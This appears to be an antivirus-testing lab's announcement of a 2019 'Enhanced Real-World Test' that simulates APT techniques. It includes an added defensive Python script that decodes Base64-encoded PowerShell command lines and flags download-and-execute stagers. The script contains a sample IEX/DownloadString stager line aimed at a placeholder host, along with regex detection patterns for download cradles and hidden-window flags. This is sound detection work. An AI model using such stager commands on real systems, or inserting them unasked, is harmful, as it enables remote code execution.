
New Test Introduction: Enhanced Real-World Test

New types of threats require new kinds of testing. Therefore, we are introducing a new test, where we use new and tailor-made attacks to compromise a victim. This “Enhanced Real-World Test” will be part of our Public Main Test Series of 2019, in both Consumer and Enterprise Test Series.

Advanced Persistent Threat (APT) is a term commonly used to describe cyber-threats that employ a complex, targeted, and effective attack to steal confidential information. Such attacks are highly purposeful and usually rely on specialized tooling: heavily obfuscated malicious code, the malicious use of benign system tools ("living off the land"), and fileless malicious code that runs in memory without ever being written to disk as an executable.

In our new, additional “Enhanced Real-World Test”, we will use the current hacking and penetration-testing techniques that attackers employ to gain access to external computer systems. These attacks can be mapped onto Lockheed Martin’s Cyber Kill Chain, whose seven distinct phases each leave their own Indicators of Compromise (IOCs) on the victim system. The tests will use a subset of the Tactics, Techniques and Procedures (TTPs) catalogued in the MITRE ATT&CK framework.

The following techniques are expected to be employed in the planned malicious attacks:

  • Use of built-in system programs, so as not to trigger signature-based detection
  • Use of popular scripting languages (VBA, VBS, batch, PowerShell) as well as compiled binaries
  • Staged and stageless (unstaged) malware, i.e. payloads fetched in several stages versus a single self-contained payload
  • Obfuscation and/or encryption of malicious code before execution (e.g. Base64 encoding, AES encryption)
  • Different C2 channels to connect back to the attacker (HTTP, HTTPS, raw TCP)
  • Use of known exploit and post-exploitation frameworks (Metasploit Framework with Meterpreter, PowerShell Empire, Pupy, etc.)
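Two items in the list above, scripting via PowerShell and Base64 obfuscation before execution, very often meet in one artifact: a process-creation event whose command line carries `-EncodedCommand` (or one of its short forms) followed by a Base64 blob. The script below, an added example that is not AV-Comparatives' test code, shows the detection side of that technique: it finds the flag, decodes the blob as UTF-16LE (PowerShell's encoding, a frequent source of broken decoders), and scores the decoded script for download-and-execute indicators. The indicator names, the host-flag list and the sample command lines are constructed for this example; the encoded blobs are generated locally and the URL uses the reserved `.invalid` domain, so nothing is fetched.

```python
"""Find, decode and score Base64-encoded PowerShell command lines.

Added example: constructed sample input, hypothetical indicator names.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# plus the documented alias -ec; attackers use short forms to dodge naive string matches.
_WORD = "encodedcommand"
_VARIANTS = sorted({_WORD[:n] for n in range(1, len(_WORD) + 1)} | {"ec"}, key=len, reverse=True)
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:" + "|".join(_VARIANTS) + r")\s+([A-Za-z0-9+/=]+)")

# Indicators of a download-and-execute stager in the decoded script
# (hypothetical names chosen for this example, not a vendor signature set).
INDICATORS = {
    "download_cradle": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "nested_base64": re.compile(r"(?i)FromBase64String"),
    "reflective_load": re.compile(r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load"),
}
# Host options that hide the window and skip profile/policy: typical of stagers.
HOST_FLAGS = re.compile(
    r"(?i)(?<=\s)-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass)\b"
)


def encode_powershell(script):
    """Encode a script the way 'powershell -EncodedCommand' expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script carried by an encoded-command flag, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes as UTF-16LE, not UTF-8
    except (ValueError, UnicodeDecodeError):  # bad alphabet or odd byte count
        return None


def analyze_line(cmdline):
    """Decode one command line and score it; None when nothing is encoded."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    flags = sorted(re.sub(r"\s+", " ", f.lower()) for f in HOST_FLAGS.findall(cmdline))
    return {
        "decoded": script,
        "indicators": hits,
        "host_flags": flags,
        # Encoded commands are common in legitimate admin tooling; escalate only
        # when the decoded content itself looks like a stager.
        "verdict": "stager" if hits else "encoded-benign",
    }


def analyze(lines):
    """Run analyze_line over a batch of command lines, keeping only encoded ones."""
    return [r for r in (analyze_line(line) for line in lines) if r is not None]


# Constructed sample process-creation command lines (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')"
ADMIN = "Get-Date | Out-File C:\\ops\\heartbeat.txt"
SAMPLE_LINES = [
    'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',   # plain, not encoded
    "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER),   # hidden stager
    "powershell.exe -EncodedCommand " + encode_powershell(ADMIN),        # encoded but benign
]

if __name__ == "__main__":
    for r in analyze(SAMPLE_LINES):
        print(r["verdict"], r["host_flags"], r["indicators"])
        print("    ", r["decoded"])
```

The check that separates the two encoded lines is the decoded content, not the presence of encoding: scheduled tasks and management agents encode commands routinely, so alerting on `-EncodedCommand` alone produces noise, while a hidden window plus a download cradle plus `IEX` in the decoded text is worth an alert.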

The tests will take place over the year and results will be published in Q4 of 2019.

Picture credit: Gorodenkoff – stock.adobe.com